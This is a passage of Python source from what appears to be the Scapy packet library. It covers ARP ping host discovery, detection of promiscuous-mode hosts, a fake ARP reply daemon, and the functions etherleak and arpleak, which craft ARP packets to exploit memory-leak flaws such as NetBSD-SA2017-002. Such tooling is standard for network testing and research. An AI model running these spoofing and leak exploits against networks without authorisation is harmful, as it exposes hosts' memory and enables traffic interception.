962 hwsrc=macb, hwdst="00:00:00:00:00:00")
963 ),
964 (x
965 for ipb, macb in tup2
966 for ipa, maca in tup1
967 for x in
968 Ether(dst=macb, src=maca) /
969 ARP(op="who-has", psrc=ipa, pdst=ipb,
970 hwsrc=maca, hwdst="00:00:00:00:00:00")
971 ),
972 )),
973 iface=iface
974 )
977class ARPingResult(SndRcvList):
978 def __init__(self,
979 res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501
980 name="ARPing", # type: str
981 stats=None # type: Optional[List[Type[Packet]]]
982 ):
983 SndRcvList.__init__(self, res, name, stats)
985 def show(self, *args, **kwargs):
986 # type: (*Any, **Any) -> None
987 """
988 Print the list of discovered MAC addresses.
989 """
991 data = list()
992 padding = 0
994 for s, r in self.res:
995 manuf = conf.manufdb._get_short_manuf(r.src)
996 manuf = "unknown" if manuf == r.src else manuf
997 padding = max(padding, len(manuf))
998 data.append((r[Ether].src, manuf, r[ARP].psrc))
1000 for src, manuf, psrc in data:
1001 print(" %-17s %-*s %s" % (src, padding, manuf, psrc))
1004@conf.commands.register
1005def arping(net: str,
1006 timeout: int = 2,
1007 cache: int = 0,
1008 verbose: Optional[int] = None,
1009 threaded: bool = True,
1010 **kargs: Any,
1011 ) -> Tuple[ARPingResult, PacketList]:
1012 """
1013 Send ARP who-has requests to determine which hosts are up::
1015 arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None
1017 Set cache=True if you want arping to modify internal ARP-Cache
1018 """
1019 if verbose is None:
1020 verbose = conf.verb
1022 hwaddr = None
1023 if "iface" in kargs:
1024 hwaddr = get_if_hwaddr(kargs["iface"])
1025 r = conf.route.route(str(net), verbose=False)
1027 ans, unans = srp(
1028 Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP(
1029 pdst=net,
1030 psrc=r[1],
1031 hwsrc=hwaddr
1032 ),
1033 verbose=verbose,
1034 filter="arp and arp[7] = 2",
1035 timeout=timeout,
1036 threaded=threaded,
1037 iface_hint=net,
1038 **kargs,
1039 )
1040 ans = ARPingResult(ans.res)
1042 if cache and ans is not None:
1043 for pair in ans:
1044 _arp_cache[pair[1].psrc] = pair[1].hwsrc
1045 if ans is not None and verbose:
1046 ans.show()
1047 return ans, unans
1050@conf.commands.register
1051def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs):
1052 # type: (str, str, **Any) -> bool
1053 """Try to guess if target is in Promisc mode. The target is provided by its ip.""" # noqa: E501
1055 responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip), type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0, **kargs) # noqa: E501
1057 return responses is not None
1060@conf.commands.register
1061def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
1062 # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList]
1063 """Send ARP who-has requests to determine which hosts are in promiscuous mode
1064 promiscping(net, iface=conf.iface)"""
1065 ans, unans = srp(Ether(dst=fake_bcast) / ARP(pdst=net),
1066 filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs) # noqa: E501
1067 ans = ARPingResult(ans.res, name="PROMISCPing")
1069 ans.show()
1070 return ans, unans
1073class ARP_am(AnsweringMachine[Packet]):
1074 """Fake ARP Relay Daemon (farpd)
1076 example:
1077 To respond to an ARP request for 192.168.100 replying on the
1078 ingress interface::
1080 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05')
1082 To respond on a different interface add the interface parameter::
1084 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0')
1086 To respond on ANY arp request on an interface with mac address ARP_addr::
1088 farpd(ARP_addr='00:01:02:03:04:05',iface='eth1')
1090 To respond on ANY arp request with my mac addr on the given interface::
1092 farpd(iface='eth1')
1094 Optional Args::
1096 inter=<n> Interval in seconds between ARP replies being sent
1098 """
1100 function_name = "farpd"
1101 filter = "arp"
1102 send_function = staticmethod(sendp)
1104 def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None):
1105 # type: (Optional[str], Optional[str], Optional[str]) -> None
1106 if isinstance(IP_addr, str):
1107 self.IP_addr = Net(IP_addr) # type: Optional[Net]
1108 else:
1109 self.IP_addr = IP_addr
1110 if isinstance(from_ip, str):
1111 self.from_ip = Net(from_ip) # type: Optional[Net]
1112 else:
1113 self.from_ip = from_ip
1114 self.ARP_addr = ARP_addr
1116 def is_request(self, req):
1117 # type: (Packet) -> bool
1118 if not req.haslayer(ARP):
1119 return False
1120 arp = req[ARP]
1121 return (
1122 arp.op == 1 and
1123 (self.IP_addr is None or arp.pdst in self.IP_addr) and
1124 (self.from_ip is None or arp.psrc in self.from_ip)
1125 )
1127 def make_reply(self, req):
1128 # type: (Packet) -> Packet
1129 ether = req[Ether]
1130 arp = req[ARP]
1132 if 'iface' in self.optsend:
1133 iff = cast(Union[NetworkInterface, str], self.optsend.get('iface'))
1134 else:
1135 iff, a, gw = conf.route.route(arp.psrc)
1136 self.iff = iff
1137 if self.ARP_addr is None:
1138 try:
1139 ARP_addr = get_if_hwaddr(iff)
1140 except Exception:
1141 ARP_addr = "00:00:00:00:00:00"
1142 else:
1143 ARP_addr = self.ARP_addr
1144 resp = Ether(dst=ether.src,
1145 src=ARP_addr) / ARP(op="is-at",
1146 hwsrc=ARP_addr,
1147 psrc=arp.pdst,
1148 hwdst=arp.hwsrc,
1149 pdst=arp.psrc)
1150 return resp
1152 def send_reply(self, reply, send_function=None):
1153 # type: (Packet, Any) -> None
1154 if 'iface' in self.optsend:
1155 self.send_function(reply, **self.optsend)
1156 else:
1157 self.send_function(reply, iface=self.iff, **self.optsend)
1159 def print_reply(self, req, reply):
1160 # type: (Packet, Packet) -> None
1161 print("%s ==> %s on %s" % (req.summary(), reply.summary(), self.iff))
1164@conf.commands.register
1165def etherleak(target, **kargs):
1166 # type: (str, **Any) -> Tuple[SndRcvList, PacketList]
1167 """Exploit Etherleak flaw"""
1168 return srp(Ether() / ARP(pdst=target),
1169 prn=lambda s_r: conf.padding_layer in s_r[1] and hexstr(s_r[1][conf.padding_layer].load), # noqa: E501
1170 filter="arp", **kargs)
1173@conf.commands.register
1174def arpleak(target, plen=255, hwlen=255, **kargs):
1175 # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
1176 """Exploit ARP leak flaws, like NetBSD-SA2017-002.
1178https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
1180 """
1181 # We want explicit packets
1182 pkts_iface = {} # type: Dict[str, List[Packet]]
1183 for pkt in ARP(pdst=target):
1184 # We have to do some of Scapy's work since we mess with
1185 # important values
1186 iface = conf.route.route(pkt.pdst)[0]
1187 psrc = get_if_addr(iface)
1188 hwsrc = get_if_hwaddr(iface)
1189 pkt.plen = plen
1190 pkt.hwlen = hwlen
1191 if plen == 4:
1192 pkt.psrc = psrc
1193 else:
1194 pkt.psrc = inet_aton(psrc)[:plen]
1195 pkt.pdst = inet_aton(pkt.pdst)[:plen]
1196 if hwlen == 6:
1197 pkt.hwsrc = hwsrc
1198 else:
1199 pkt.hwsrc = mac2str(hwsrc)[:hwlen]
1200 pkts_iface.setdefault(iface, []).append(
1201 Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt
1202 )
1203 ans, unans = SndRcvList(), PacketList(name="Unanswered")
1204 for iface, pkts in pkts_iface.items():
1205 ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs)
1206 ans += ans_new
1207 unans += unans_new
1208 ans.listname = "Results"
1209 unans.listname = "Unanswered"
1210 for _, rcv in ans:
1211 if ARP not in rcv:
1212 continue
1213 rcv = rcv[ARP]
1214 psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc)
1215 if plen > 4 and len(psrc) > 4:
1216 print("psrc")
1217 hexdump(psrc[4:])
1218 print()
1219 hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc)
1220 if hwlen > 6 and len(hwsrc) > 6:
1221 print("hwsrc")
1222 hexdump(hwsrc[6:])
1223 print()
1224 return ans, unans